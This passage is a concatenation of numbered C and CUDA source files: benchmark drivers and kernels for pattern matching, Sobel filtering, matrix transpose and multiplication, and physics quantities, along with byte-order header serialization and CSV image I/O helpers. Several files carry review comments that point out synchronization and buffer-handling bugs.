    cudaEventRecord(stop,0);
    cudaEventSynchronize(stop);
    cudaEventElapsedTime(&time_H2D,start,stop);
    printf("HostToDevice memcopy time: %fs\n", time_H2D/1000);

    // RUN KERNEL
    cudaEventRecord(start, 0);
    matchPattern_gpu_1<<< ceil((float)len/(TITLE_SIZE*NWORDS)),NWORDS>>>(d_text, d_words, d_matches, nwords, len);
    cudaEventRecord(stop,0);
    cudaEventSynchronize(stop);
    checkCudaErrors(cudaPeekAtLastError());
    cudaEventElapsedTime(&time_kernel,start,stop);
    printf("Kernel execution time: %fs\n", time_kernel/1000);

    cudaEventRecord(start, 0);
    checkCudaErrors(cudaMemcpy(h_matches, d_matches, nwords*sizeof(int), cudaMemcpyDeviceToHost));
    cudaEventRecord(stop,0);
    cudaEventSynchronize(stop);
    cudaEventElapsedTime(&time_D2H,start,stop);
    printf("DeviceToHost memcopy time: %fs\n", time_D2H/1000);
    printf("Total memcopy time: %fs\n", (time_D2H+time_H2D)/1000);
    printf("Total memcopy+kernel time: %fs\n", (time_D2H+time_H2D+time_kernel)/1000);
    printf("Speedup without memory: %f\n", cpuRunTime/((time_kernel)/1000));
    printf("Speedup with memory: %f\n", cpuRunTime/((time_D2H + time_H2D + time_kernel)/1000));

    check_matches(h_matches);

    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    free(h_matches);
    cudaFree(d_words);
    cudaFree(d_matches);
    cudaFree(d_text);
}

int main(int argc, const char **argv)
{
    intialise("./data/small.txt");
    exec_CPU();
    exec_gpu_simple();
    intialise("./data/medium.txt");
    exec_CPU();
    exec_gpu_simple();
    intialise("./data/large.txt");
    exec_CPU();
    exec_gpu_simple();
    deinit();
}
21,472
#include "includes.h"

/*
 * Set every element of w[0 .. size) to the constant `val`.
 * One thread per element; threads whose global index falls outside the
 * array exit immediately.
 */
__global__ void fill(float * w, float val, int size)
{
    const int idx = (blockIdx.x * blockDim.x) + threadIdx.x;
    if (idx >= size)
        return;
    w[idx] = val;
}
21,473
// -------------------
// Generic
// -------------------

/* Convert 1-based row indices to 0-based: subtract one from each of the m entries. */
__global__ void indexShiftDown(int *d_rows, const int m){
    unsigned int i = blockDim.x * blockIdx.x + threadIdx.x;
    if (i < m)
        d_rows[i] -= 1;
}

/* Convert 0-based row indices back to 1-based: add one to each of the m entries. */
__global__ void indexShiftUp(int *d_rows, const int m){
    unsigned int i = blockDim.x * blockIdx.x + threadIdx.x;
    if (i < m)
        d_rows[i] += 1;
}

/* Fill vec[0 .. n) with the constant `value`. */
__global__ void fill(int *vec, int value, int n){
    unsigned int i = blockDim.x * blockIdx.x + threadIdx.x;
    if (i < n)
        vec[i] = value;
}

// -------------------
// Boundary matrix and PH set-up & preprocessing
// -------------------

/*
 * Scatter the COO-style (d_rows, d_cols) pairs — assumed sorted in
 * column-major order — into the fixed-width layout d_rows_mp, which
 * holds up to p row indices per column at d_rows_mp[col*p ...]. Only
 * the thread sitting on the first entry of each column run copies that
 * whole run, so there are no write conflicts.
 */
__global__ void create_rows_mp(int *d_rows, int *d_cols, int *d_rows_mp, int m, int p, int nnz){
    int tid = threadIdx.x + blockDim.x*blockIdx.x;
    if (tid >= nnz)
        return;
    // Skip threads that are not at the start of a column run.
    if (tid != 0 && d_cols[tid] == d_cols[tid-1])
        return;
    int col = d_cols[tid];
    int i = 0;
    while ((tid + i < nnz) && col == d_cols[tid + i]){
        d_rows_mp[col*p + i] = d_rows[tid + i];
        i++;
    }
}

/*
 * For each of the m columns, compute its "low" — the last row index
 * stored before the -1 sentinel in the fixed-width layout — writing -1
 * for empty columns.
 */
__global__ void compute_low(int *d_rows_mp, int *d_low, int m, int p){
    int j = threadIdx.x + blockDim.x*blockIdx.x;
    if (j < m){
        int last = -1;
        int pos = j*p;
        const int pos_end = (j+1)*p;
        for (; pos < pos_end && d_rows_mp[pos] != -1; ++pos)
            last = d_rows_mp[pos];
        d_low[j] = last;
    }
}

/*
 * Mark non-essential columns: whenever column j has a pivot (low > -1),
 * clear the essential flag of both j and its pivot row.
 */
__global__ void compute_ess_true(int *d_low_true, int *d_ess_true, int m){
    int j = threadIdx.x + blockDim.x*blockIdx.x;
    if (j >= m)
        return;
    int low = d_low_true[j];
    if (low > -1){
        d_ess_true[j] = 0;
        d_ess_true[low] = 0;
    }
}
21,474
#include "includes.h"

#define BLOCK_SIZE 16       // threads per block dimension
#define HEADER_SIZE 122     // BMP header bytes kept as reference
#define BLOCK_SIZE_SH 18    // shared tile side: BLOCK_SIZE + 2-pixel halo

typedef unsigned char BYTE;

/**
 * Structure that represents a BMP image.
 */
typedef struct
{
    int width;
    int height;
    float *data;
} BMPImage;

typedef struct timeval tval;

BYTE g_info[HEADER_SIZE]; // Reference header

/*
 * Apply a filter_dim x filter_dim convolution matrix at the pixel pointed
 * to by `image` (top-left corner of the window), where `stride` is the
 * row pitch of the image buffer. Returns the weighted sum; no bounds
 * checking — the caller must guarantee the window fits.
 */
__device__ float gpu_applyFilter(float *image, int stride, float *matrix, int filter_dim)
{
    float pixel = 0.0f;

    for (int h = 0; h < filter_dim; h++)
    {
        int offset = h * stride;
        int offset_kernel = h * filter_dim;

        for (int w = 0; w < filter_dim; w++)
        {
            pixel += image[offset + w] * matrix[offset_kernel + w];
        }
    }

    return pixel;
}

/*
 * Sobel edge detector over a width x height float image. Each
 * BLOCK_SIZE x BLOCK_SIZE block stages its tile plus a 2-pixel
 * right/bottom halo into shared memory (BLOCK_SIZE_SH = BLOCK_SIZE + 2
 * per side), then every thread convolves its 3x3 window with both Sobel
 * kernels and writes the gradient magnitude to image_out at an offset
 * shifted by (1,1) — i.e. the output pixel is the window centre.
 *
 * NOTE(review): all __syncthreads() calls sit inside the
 * `if (index_x < width-2 && index_y < height-2)` guard; blocks that
 * straddle the image edge reach the barriers with only a subset of their
 * threads, which is undefined behaviour unless width/height are chosen so
 * whole blocks fall inside the guard — confirm against the host launch.
 * NOTE(review): the output can be negative or exceed 255; the caller is
 * expected to compensate while storing the file.
 */
__global__ void gpu_sobel(int width, int height, float *image, float *image_out)
{
    // 3x3 Sobel kernels for horizontal and vertical gradients.
    float sobel_x[9] = { 1.0f, 0.0f, -1.0f,
                         2.0f, 0.0f, -2.0f,
                         1.0f, 0.0f, -1.0f };
    float sobel_y[9] = { 1.0f,  2.0f,  1.0f,
                         0.0f,  0.0f,  0.0f,
                        -1.0f, -2.0f, -1.0f };

    const int index_x = blockIdx.x*blockDim.x + threadIdx.x;
    const int index_y = blockIdx.y*blockDim.y + threadIdx.y;

    // Shared tile with a 2-pixel halo on the right and bottom edges.
    __shared__ float sh_block[BLOCK_SIZE_SH * BLOCK_SIZE_SH];

    if (index_x < (width - 2) && index_y < (height - 2))
    {
        int offset_t = index_y * width + index_x;          // window top-left in global memory
        int offset = (index_y + 1) * width + (index_x + 1); // window centre (output position)
        int offset_shared = threadIdx.y * BLOCK_SIZE_SH + threadIdx.x;

        // Each thread loads its own pixel.
        sh_block[offset_shared] = image[offset_t];
        __syncthreads();

        // Bottom-row threads fetch the two halo rows below the tile.
        if((threadIdx.y == BLOCK_SIZE - 1))
        {
            sh_block[offset_shared + BLOCK_SIZE_SH] = image[offset_t + width];
            sh_block[offset_shared + BLOCK_SIZE_SH*2] = image[offset_t + 2*width];
        }
        __syncthreads();

        // Right-column threads fetch the two halo columns to the right.
        if((threadIdx.x == BLOCK_SIZE - 1))
        {
            sh_block[offset_shared + 1] = image[offset_t + 1];
            sh_block[offset_shared + 2] = image[offset_t + 2];
        }
        __syncthreads();

        // Bottom-right thread fetches the 2x2 corner halo.
        if((threadIdx.y == BLOCK_SIZE - 1) && (threadIdx.x == BLOCK_SIZE - 1))
        {
            sh_block[offset_shared + BLOCK_SIZE_SH + 1] = image[offset_t + width + 1];
            sh_block[offset_shared + BLOCK_SIZE_SH*2 + 1] = image[offset_t + width*2 + 1];
            sh_block[offset_shared + BLOCK_SIZE_SH + 2] = image[offset_t + width + 2];
            sh_block[offset_shared + BLOCK_SIZE_SH*2 + 2] = image[offset_t + width*2 + 2];
        }
        __syncthreads();

        // Convolve from shared memory (pitch = BLOCK_SIZE_SH).
        float gx = gpu_applyFilter(&sh_block[offset_shared], BLOCK_SIZE_SH, sobel_x, 3);
        float gy = gpu_applyFilter(&sh_block[offset_shared], BLOCK_SIZE_SH, sobel_y, 3);

        // Note: The output can be negative or exceed the max. color value
        // of 255. We compensate this afterwards while storing the file.
        image_out[offset] = sqrtf(gx * gx + gy * gy);
    }
}
21,475
#include <stdio.h>
#include <errno.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include "cs_header.h"

/*
 * (De)serialization of struct cs_header / struct cs_block_header over a file
 * descriptor. All multi-byte integer fields are converted to/from network
 * byte order (htonl/ntohl, htons/ntohs) so the stream is endian-portable.
 * Field layout is defined in cs_header.h (not visible here).
 *
 * All functions return 1 on success and 0 on failure.
 */

/*
 * Fill a cs_header from the individual parameters, convert every integer
 * field to network byte order, and write the whole struct to fd.
 *
 * NOTE(review): a short write() (i != sizeof(csh)) is treated as failure,
 * but partial writes are not retried; on a short read/write errno may be
 * stale — verify this is acceptable for the transports used.
 */
int cs_put_header( int fd, char coding, char opt, char m, int x, int y, int xb, int yb, int zb,
	int xc0, int yc0, int zc0, int xc1, int yc1, int zc1, int xc2, int yc2, int zc2,
	int xo, int yo, int zo, int xe, int ye, int ze, int xa, int ya,
	int edge_x, int edge_y, int md_x, int md_y, int md_z, int weight )
{
	int i ;
	struct cs_header csh ;

	/* zero first so padding bytes are deterministic on the wire */
	memset( &csh, 0, sizeof( csh )) ;

	/* single-byte fields: no byte-order conversion needed */
	csh.coding = coding ;
	csh.coding_opt = opt ;
	csh.matrix = m ;

	csh.frame.x = htonl( x );
	csh.frame.y = htonl( y );

	csh.block.x = htonl( xb );
	csh.block.y = htonl( yb );
	csh.block.z = htonl( zb );

	csh.select[0].x = htonl( xc0 );
	csh.select[0].y = htonl( yc0 );
	csh.select[0].z = htonl( zc0 );

	csh.select[1].x = htonl( xc1 );
	csh.select[1].y = htonl( yc1 );
	csh.select[1].z = htonl( zc1 );

	csh.select[2].x = htonl( xc2 );
	csh.select[2].y = htonl( yc2 );
	csh.select[2].z = htonl( zc2 );

	csh.overlap.x = htonl( xo );
	csh.overlap.y = htonl( yo );
	csh.overlap.z = htonl( zo );

	csh.expand.x = htonl( xe );
	csh.expand.y = htonl( ye );
	csh.expand.z = htonl( ze );

	csh.md.x = htonl( md_x );
	csh.md.y = htonl( md_y );
	csh.md.z = htonl( md_z );

	csh.edge.x = htonl( edge_x );
	csh.edge.y = htonl( edge_y );

	csh.append.x = htonl( xa );
	csh.append.y = htonl( ya );

	/* weight is a 16-bit field, hence htons rather than htonl */
	csh.weight = htons( weight ) ;

	i = write ( fd, &csh, sizeof ( csh )) ;
	if ( i != sizeof ( csh ))
	{
		fprintf( stderr, "cs_put_header failed errno %d\n", errno ) ;
		return ( 0 ) ;
	}
	return ( 1 ) ;
}

/*
 * Read one cs_header from fd into *cshp and convert every integer field
 * back to host byte order in place. The three select[] cubes are converted
 * in a loop over CUBE_INFO_CNT (defined in cs_header.h).
 */
int cs_get_header( int fd, struct cs_header *cshp )
{
	int i ;

	i = read ( fd, cshp, sizeof ( *cshp )) ;
	if ( i != sizeof ( *cshp ))
	{
		fprintf( stderr, "cs_get_header failed errno %d\n", errno ) ;
		return ( 0 ) ;
	}

	cshp->frame.x = ntohl( cshp->frame.x );
	cshp->frame.y = ntohl( cshp->frame.y );

	cshp->block.x = ntohl( cshp->block.x );
	cshp->block.y = ntohl( cshp->block.y );
	cshp->block.z = ntohl( cshp->block.z );

	for ( i = 0 ; i < CUBE_INFO_CNT ; i++ )
	{
		cshp->select[i].x = ntohl( cshp->select[i].x );
		cshp->select[i].y = ntohl( cshp->select[i].y );
		cshp->select[i].z = ntohl( cshp->select[i].z );
	}

	cshp->overlap.x = ntohl( cshp->overlap.x );
	cshp->overlap.y = ntohl( cshp->overlap.y );
	cshp->overlap.z = ntohl( cshp->overlap.z );

	cshp->expand.x = ntohl( cshp->expand.x );
	cshp->expand.y = ntohl( cshp->expand.y );
	cshp->expand.z = ntohl( cshp->expand.z );

	cshp->append.x = ntohl( cshp->append.x );
	cshp->append.y = ntohl( cshp->append.y );

	cshp->md.x = ntohl( cshp->md.x );
	cshp->md.y = ntohl( cshp->md.y );
	cshp->md.z = ntohl( cshp->md.z );

	cshp->edge.x = ntohl( cshp->edge.x );
	cshp->edge.y = ntohl( cshp->edge.y );

	cshp->weight = ntohs( cshp->weight ) ;

	return ( 1 ) ;
}

/*
 * Write a per-block header carrying the two RNG seeds (converted to
 * network byte order) to fd.
 */
int cs_put_block_header( int fd, int random_l, int random_r )
{
	int i ;
	struct cs_block_header csh ;

	memset( &csh, 0, sizeof( csh )) ;

	csh.random_l = htonl( random_l ) ;
	csh.random_r = htonl( random_r ) ;

	i = write ( fd, &csh, sizeof ( csh )) ;
	if ( i != sizeof ( csh ))
	{
		fprintf( stderr, "cs_put_block_header failed errno %d\n", errno ) ;
		return ( 0 ) ;
	}
	return ( 1 ) ;
}

/*
 * Read a per-block header from fd and convert the two seed fields back to
 * host byte order.
 */
int cs_get_block_header( int fd, struct cs_block_header *cshp )
{
	int i ;

	i = read ( fd, cshp, sizeof ( *cshp )) ;
	if ( i != sizeof ( *cshp ))
	{
		fprintf( stderr, "cs_get_block_header failed errno %d\n", errno ) ;
		return ( 0 ) ;
	}

	cshp->random_l = ntohl( cshp->random_l );
	cshp->random_r = ntohl( cshp->random_r );

	return ( 1 ) ;
}
21,476
#include "includes.h"

/**
 * Per-cell internal energy:
 *   Eneint = Etot - 0.5*(Vx^2 + Vy^2 + Vz^2) - 0.5*(Bx^2 + By^2 + Bz^2)/Rho
 *
 * Expected launch: 1D thread blocks of CUDA_BLOCK_SIZE threads on a 2D grid
 * of width CUDA_GRID_SIZE (both macros come from includes.h).
 *
 * Fix vs. the original: the 0.5 literals were double, silently promoting
 * the whole expression to double precision; they are now 0.5f.
 *
 * NOTE(review): no guard against Rho[igrid] == 0 — presumably density is
 * always positive in this solver; confirm with callers.
 */
__global__ void ComputeInternalEnergy_kernel(float *Rho, float *Vx, float *Vy, float *Vz,
                                             float *Etot, float *Eneint,
                                             float *Bx, float *By, float *Bz, int size)
{
    // get thread and block index
    const long tx = threadIdx.x;
    const long bx = blockIdx.x;
    const long by = blockIdx.y;

    int igrid = tx + bx*CUDA_BLOCK_SIZE + by*CUDA_BLOCK_SIZE*CUDA_GRID_SIZE;
    if (igrid >= size) return;   // tail guard: grid may overshoot size

    // compute internal energy (float-only arithmetic)
    Eneint[igrid] = Etot[igrid]
                  - 0.5f*(Vx[igrid]*Vx[igrid] + Vy[igrid]*Vy[igrid] + Vz[igrid]*Vz[igrid])
                  - 0.5f*(Bx[igrid]*Bx[igrid] + By[igrid]*By[igrid] + Bz[igrid]*Bz[igrid])/Rho[igrid];
}
21,477
#include <cuda.h>

/* Entry point: intentionally does nothing (placeholder/skeleton program). */
int main(void)
{
    return 0;
}
21,478
//
// Created by root on 2020/11/19.
//
// Matrix-transpose micro-benchmark: two naive global-memory kernels and two
// shared-memory-tiled kernels, driven by a main() that runs each variant on
// a 1024x1024 int matrix. No correctness verification is performed (the
// check loops are commented out).
//
#include "stdio.h"
#include "cuda_runtime.h"

#define BDIMX 32
#define BDIMY 32

// Naive transpose: coalesced LOAD (in[y*nx+x]), strided STORE (out[x*ny+y]).
__global__ void transposeNaiveGem(int *in, int *out, int nx, int ny) {
    int x = threadIdx.x + blockIdx.x * blockDim.x;
    int y = threadIdx.y + blockIdx.y * blockDim.y;

    if (x < nx && y < ny) {
        out[x * ny + y] = in[y * nx + x];
    }
}

// Naive transpose, mirrored: strided LOAD, coalesced STORE.
__global__ void transposeNaiveGem2(int *in, int *out, int nx, int ny) {
    int x = threadIdx.x + blockIdx.x * blockDim.x;
    int y = threadIdx.y + blockIdx.y * blockDim.y;

    if (x < nx && y < ny) {
        out[y * nx + x] = in[x * ny + y];
        // store is combined but load not
        // Bytes count per request in Pascal seems lower than 128
    }
}

// Shared-memory transpose: stage a BDIMX x BDIMY tile, then write it out
// transposed so both global load and store are coalesced.
//
// NOTE(review): __syncthreads() sits inside the divergent `if (ix < nx &&
// iy < ny)` branch — undefined behavior when nx/ny are not multiples of the
// block dims (benign here only because 1024 is a multiple of 32).
// NOTE(review): the bounds check reuses the REMAPPED ix/iy against nx/ny in
// the same order; for non-square matrices the limits look swapped — verify
// before using with nx != ny.
__global__ void transposeSmem(int *in, int *out, int nx, int ny) {
    int ix = blockIdx.x * blockDim.x + threadIdx.x; // thread x coordinate in block(origin matrix)
    int iy = blockIdx.y * blockDim.y + threadIdx.y; // thread y coordinate in block(origin matrix)

    __shared__ int tile[BDIMX][BDIMY];
    // __shared__ int tile[BDIMX][BDIMY + 1]; // We can append one column per row to eliminate store bank conflict

    int ti = iy * nx + ix; // thread data index in matrix / coordinate in origin matrix

    int bidx = threadIdx.y * blockDim.x + threadIdx.x; // thread index in block
    int irow = bidx / blockDim.y; // row of current thread in block
    int icol = bidx % blockDim.y; // column of current thread in block

    ix = blockIdx.y * blockDim.y + icol; // x coordinate in transpose matrix
    iy = blockIdx.x * blockDim.x + irow; // y coordinate in transpose matrix

    int to = iy * ny + ix; // coordinate in transpose matrix

    if (ix < nx && iy < ny) {
        tile[threadIdx.x][threadIdx.y] = in[ti]; // We got bank conflict here, but both the throughput and speed are still higher than global memory
        __syncthreads();
        out[to] = tile[irow][icol]; // Just change the index of data in array
    }
}

// Unrolled (x2 in x) + padded shared-memory transpose: each thread handles
// two tiles per row of blocks; the +1 column pad avoids bank conflicts.
//
// NOTE(review): icol/irow are derived with blockDim.x in both the / and %
// (unlike transposeSmem, which uses blockDim.y), and the guards compare
// icol/irow (block-local, < 32) against nx/ny (global) — so the guards are
// effectively always true for large matrices. The __syncthreads() calls are
// again inside divergent branches. Review carefully before reuse.
__global__ void transposeSmemUnrollPad(int *in, int *out, int nx, int ny) {
    int ix = blockDim.x * blockIdx.x * 2 + threadIdx.x; // thread start x index in block
    int iy = blockDim.y * blockIdx.y + threadIdx.y; // thread start y index in block

    __shared__ int tile[BDIMX * 2][BDIMY + 1];

    int ti = iy * nx + ix; // start data index in block

    int bidx = threadIdx.y * blockDim.x + threadIdx.x; // thread start index in block
    int irow = bidx / blockDim.x; // row in origin matrix
    int icol = bidx % blockDim.x; // column in origin matrix

    int outputIndex = ix * ny + blockIdx.y * BDIMY + irow; // data index in the output array

    if (icol < nx && irow < ny) {
        tile[icol][irow] = in[ti];
        __syncthreads();
        out[outputIndex] = tile[icol][irow];
    }
    if (icol + blockDim.x < nx && irow < ny) {
        tile[icol + blockDim.x][irow] = in[ti + blockDim.x];
        __syncthreads();
        out[outputIndex + blockDim.x * ny] = tile[icol + blockDim.x][irow];
    }
}

// Driver: fills a 1024x1024 int matrix with 0..n-1, runs the naive kernel,
// the unroll+pad kernel, and the plain shared-memory kernel (twice), copying
// results back each time. Verification printf loops are left commented out.
//
// NOTE(review): no CUDA API or kernel-launch error checking anywhere; a
// failed launch would go unnoticed.
int main() {
    int nx = 1024, ny = 1024;
    int nBytes = nx * ny * sizeof(int);

    int *h_in = (int *) malloc(nBytes);
    int *h_out = (int *) malloc(nBytes);
    for (int i = 0; i < nx * ny; i++) {
        h_in[i] = i;
    }

    int *d_in;
    int *d_out;
    cudaMalloc(&d_in, nBytes);
    cudaMalloc(&d_out, nBytes);
    cudaMemcpy(d_in, h_in, nBytes, cudaMemcpyHostToDevice);

    dim3 blockDim(BDIMX, BDIMY);
    dim3 gridDim((nx + blockDim.x - 1) / blockDim.x, (ny + blockDim.y - 1) / blockDim.y);

    // Run 1: naive transpose.
    transposeNaiveGem<<<gridDim, blockDim>>>(d_in, d_out, nx, ny);
    cudaDeviceSynchronize();
    cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost);
    // for (int i = 0; i < nx * ny; i++) {
    //     printf("%d->", h_out[i]);
    // }
    //
    // printf("\n====================\n");

    memset(h_out, 0, nBytes);
    cudaMemset(d_out, 0, nBytes);

    // Run 2: unroll-by-2 + padded shared-memory transpose (grid halved in x).
    dim3 blockDim_(BDIMX, BDIMY);
    dim3 gridDim_((nx + 2 * blockDim_.x - 1) / (2 * blockDim_.x), (ny + blockDim_.y - 1) / blockDim_.y);
    printf("grid_: (%d, %d), block_: (%d, %d)\n", gridDim_.x, gridDim_.y, blockDim_.x, blockDim_.y);
    transposeSmemUnrollPad<<<gridDim_, blockDim_>>>(d_in, d_out, nx, ny);
    cudaDeviceSynchronize();
    cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost);
    // for (int i = 0; i < nx * ny; i++) {
    //     printf("%d->", h_out[i]);
    // }
    //
    //
    printf("\n====================\n");

    memset(h_out, 0, nBytes);
    cudaMemset(d_out, 0, nBytes);

    // Run 3: plain shared-memory transpose.
    transposeSmem<<<gridDim, blockDim>>>(d_in, d_out, nx, ny);
    cudaDeviceSynchronize();
    cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost);
    // for (int i = 0; i < nx * ny; i++) {
    //     printf("%d->", h_out[i]);
    // }

    memset(h_out, 0, nBytes);
    cudaMemset(d_out, 0, nBytes);

    // Run 4: repeat of run 3 (presumably for timing stability).
    transposeSmem<<<gridDim, blockDim>>>(d_in, d_out, nx, ny);
    cudaDeviceSynchronize();
    cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost);
    // for (int i = 0; i < nx * ny; i++) {
    //     printf("%d->", h_out[i]);
    // }

    cudaFree(d_in);
    cudaFree(d_out);
    free(h_in);
    free(h_out);
}
21,479
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>

/* NOTE(review): declaring errno as `extern int` instead of relying on the
 * <errno.h> macro is non-portable (errno may be a thread-local macro). */
extern int errno;

/* Function that saves the Image.
 *
 * Writes `data` (dataRows x attributes, row-major) as CSV next to the input
 * file, deriving a unique "<base>_out[N].csv" name.
 *
 * NOTE(review): strtok/strcat mutate the CALLER's in_filename buffer and
 * assume it has room for the appended suffixes — buffer overflow risk if
 * the caller passes a tight buffer. fopen() is also unchecked; a NULL fp
 * would crash in fprintf. Confirm callers always pass a writable, oversized
 * buffer. */
void writeImg(char *in_filename,float *data, int dataRows,int attributes){
    FILE *fp;
    int counter=1;
    char delim = ',';
    char *filename;

    /* Strip the extension and append "_out.csv". */
    filename = strtok(in_filename,".");
    filename = strcat(filename,"_out.csv");

    /* Check if the out file existsi and find an appropriate name that is unique*/
    while (access(filename,F_OK) == 0){
        filename = strtok(filename,"_");
        filename = strcat(filename,"_out");
        char num[100];
        sprintf(num,"%d",counter);
        counter++;
        filename = strcat(filename, num);
        filename = strcat(filename,".csv");
    }

    /* Open File */
    fp = fopen(filename,"w");

    /* Write contents */
    for (int i=0;i<dataRows;i++){
        for (int j=0;j<attributes;j++){
            /* If writing the last element of the row skip the delimiter and add new line instead*/
            if ( j == attributes-1)
                fprintf(fp,"%f\n",data[i * attributes +j]);
            else
                fprintf(fp,"%f%c",data[i * attributes +j],delim);
        }
    }

    /* Close File*/
    fclose(fp);
}

/* Function that checks the number of arguments.
 * `num` is the expected number of user arguments (excluding argv[0]);
 * exits with a diagnostic on any mismatch. */
void checkArgsNum(int num,int argc){
    num++; // Add 1 to offset
    if (num == argc )
        return;
    else if (argc == 1 ){
        fprintf(stderr, "Line:%d No argument was given\n",__LINE__);
        exit(EXIT_FAILURE);
    }
    else if (argc < num && argc > 1){
        fprintf(stderr, "Line:%d Less arguments was given\n",__LINE__);
        exit(EXIT_FAILURE);
    }
    else if (argc > num){
        fprintf(stderr, "Line:%d More args given\n",__LINE__);
        exit(EXIT_FAILURE);
    }
}

/* Check if patch size given as an argument is an odd number; exits if not.
 * (Note: a negative patchSize also fails, since -n % 2 is -1 in C.) */
void checkPatchSize(int patchSize){
    if ( (patchSize % 2)!=1){
        fprintf(stderr, "Line:%d Patch Size is not odd number\n",__LINE__);
        exit(EXIT_FAILURE);
    }
}

/* Helper function that gets the number of attributes in the csv file.
 * Counts delimiters on the first line (+1) and rewinds fp.
 * NOTE(review): lines longer than 8192 bytes would be truncated and
 * miscounted. */
int getAttributes(FILE *fp){
    /* Variables */
    char buf[8192];
    int attributes=0;
    char delim=',';

    /* Get first line from file */
    /* and check if file is empty */
    if (fgets(buf,8192,fp)==NULL){
        fprintf(stderr,"Line %d: Input file empty\n",__LINE__ );
        exit(EXIT_FAILURE);
    }

    /* Count the occurences of the delimiters */
    for(int i=0;i<strlen(buf);i++){
        if (buf[i]==delim)
            attributes++;
    }

    /* Add 1 to the occurrences of the delimiter */
    attributes++;

    /* Rewind fp */
    rewind(fp);
    return attributes;
}

/* Function that reads csv files and returns a 2d array.
 * Grows `data` one row at a time via realloc (O(rows) reallocations) and
 * reports the row count through *dataRows and column count through
 * *attributes. Caller owns the returned rows. */
float ** readCSV(FILE *fp, float **data, int *dataRows,int *attributes){
    /* Variables */
    *attributes = getAttributes(fp);
    const char delim[] = ",";
    int row=0;
    char buf[8192];

    /* Read Lines one by one and split them on the delimiter */
    while(fgets(buf,8192,fp)){
        /* realloc the data array to fill another row */
        data = (float **)realloc(data,(row+1)*sizeof(float *));
        data[row] = (float *)malloc(*attributes*(sizeof(float)));

        /* Split the buf on the delimiter and fill the row */
        char *token;
        for (int i = 0; i< *attributes; i++){
            if (i==0)
                token = strtok(buf,delim);
            else
                token = strtok(NULL,delim);
            /* If token NULL no more lines exist (Maybe there is no need for this) */
            if (token==NULL)
                break;
            /* Covert str to float */
            sscanf(token, "%f",&data[row][i]);
        }
        row++;
    }

    /* Return dataRows */
    *dataRows=row;
    rewind(fp);
    return data;
}

/* Wrapper function that calls the pre-existing readCSV and returns the data
 * as a 1D array (row-major, dataRows x attributes). Exits on open failure.
 * Frees the intermediate 2D array before returning; caller frees the
 * returned buffer. */
float * getImg( char *filename, int *dataRows, int *attributes ){
    FILE *fp;

    /* Open file */
    fp= fopen (filename,"r");
    if (fp == NULL){
        fprintf(stderr, "Line %d: Error opening file %s\n",__LINE__,strerror(errno));
        exit (EXIT_FAILURE);
    }

    /* Read csv */
    float **data2D= (float **)malloc(0);
    data2D=readCSV(fp,data2D,dataRows,attributes);

    /* Make 2D array to 1D */
    float *data1D = (float *)malloc(*attributes * (*dataRows) * sizeof(float));
    for (int i=0;i<(*dataRows);i++)
        for (int j=0;j<(*attributes);j++)
            data1D[i*(*attributes) + j] = data2D[i][j];

    /* Free data memory*/
    int RowsToFree=*dataRows;
    while(RowsToFree)
        free(data2D[-- RowsToFree]);
    free(data2D);

    /* Close file */
    fclose(fp);
    return data1D;
}
21,480
#include <stdio.h>
#include <cuda.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>

/* Tiled matrix multiply: C = A * B for msize x msize float matrices.
 * Each thread computes a task x task sub-tile; shared memory is split into
 * an A half and a B half (see kernel below). */
__global__ void mul( float *Ad, float *Bd, float *Cd, int msize, int tile, int task);

/* Usage: prog msize tile task [anything]
 *   argv[1]: msize  - matrix dimension
 *   argv[2]: tile   - tile width per block (must divide msize)
 *   argv[3]: task   - work items per thread (must divide tile)
 *   argv[4]: if present (argc==5), matrices are filled with 1s and the
 *            result is verified against msize.
 *
 * NOTE(review): argv[1..3] are read without checking argc — running with no
 * arguments dereferences NULL. malloc/cudaMalloc/cudaMemcpy results are
 * unchecked.
 * NOTE(review): in the random branch, srand(time(NULL)) is reseeded inside
 * the inner loop, so rand() returns the SAME value for every element
 * generated within the same second — the "random" matrices are essentially
 * constant. Seed once before the loops instead.
 * NOTE(review): SharedMemBytes = 2*tile*msize floats can easily exceed the
 * 48 KB default shared-memory limit (e.g. tile=32, msize=1024 -> 256 KB),
 * which would make the launch fail silently since errors are not checked. */
int main( int argc, char **argv){
    // argv[0]: name, argv[1]: msize, argv[2]: tile_width/ per block, argv[3]: task per thread, argv[4]: isVerification
    clock_t start = clock();
    int i, j;
    int msize = atoi(argv[1]);
    int tile = atoi(argv[2]);
    int task = atoi(argv[3]);
    float *A, *B, *C;
    float *Ad, *Bd, *Cd;

    A = (float*)malloc(msize * msize * sizeof(float));
    B = (float*)malloc(msize * msize * sizeof(float));
    C = (float*)malloc(msize * msize * sizeof(float));

    // for verification
    if( argc == 5){
        for( i = 0; i < msize; i++){
            for( j = 0; j < msize; j++){
                A[i * msize + j] = (float)1;
                B[i * msize + j] = (float)1;
            }
        }
    }
    else{
        for( i = 0; i < msize; i++){
            for ( j = 0; j < msize; j++){
                srand(time(NULL));
                A[ i * msize + j] = (float)(rand()%2);
                srand(time(NULL));
                B[ i * msize + j] = (float)(rand()%2);
            }
        }
    }

    cudaMalloc((void**)&Ad, msize * msize * sizeof(float));
    cudaMalloc((void**)&Bd, msize * msize * sizeof(float));
    cudaMalloc((void**)&Cd, msize * msize * sizeof(float));
    cudaMemcpy(Ad, A, msize * msize * sizeof(float), cudaMemcpyHostToDevice);
    cudaMemcpy(Bd, B, msize * msize * sizeof(float), cudaMemcpyHostToDevice);

    dim3 dimGrid((msize/tile), (msize/tile));
    dim3 dimBlock((tile/task), (tile/task));
    size_t SharedMemBytes = 2 * tile * msize * sizeof(float);
    mul<<<dimGrid, dimBlock, SharedMemBytes>>> (Ad, Bd, Cd, msize, tile, task);

    // cudaMemcpy below is a blocking call, so no explicit sync is needed.
    cudaMemcpy(C, Cd, msize * msize * sizeof(float), cudaMemcpyDeviceToHost);

    //print out the verification result
    int beZero = 0;
    if( argc == 5){
        printf("\n=================== V =========================\n");
        for ( i = 0; i < msize; i++){
            printf("\n");
            for( j = 0; j < msize; j++){
                printf("%.2f ", C[i * msize + j]);
                if ( C[i * msize + j] != msize) beZero++;
            }
        }
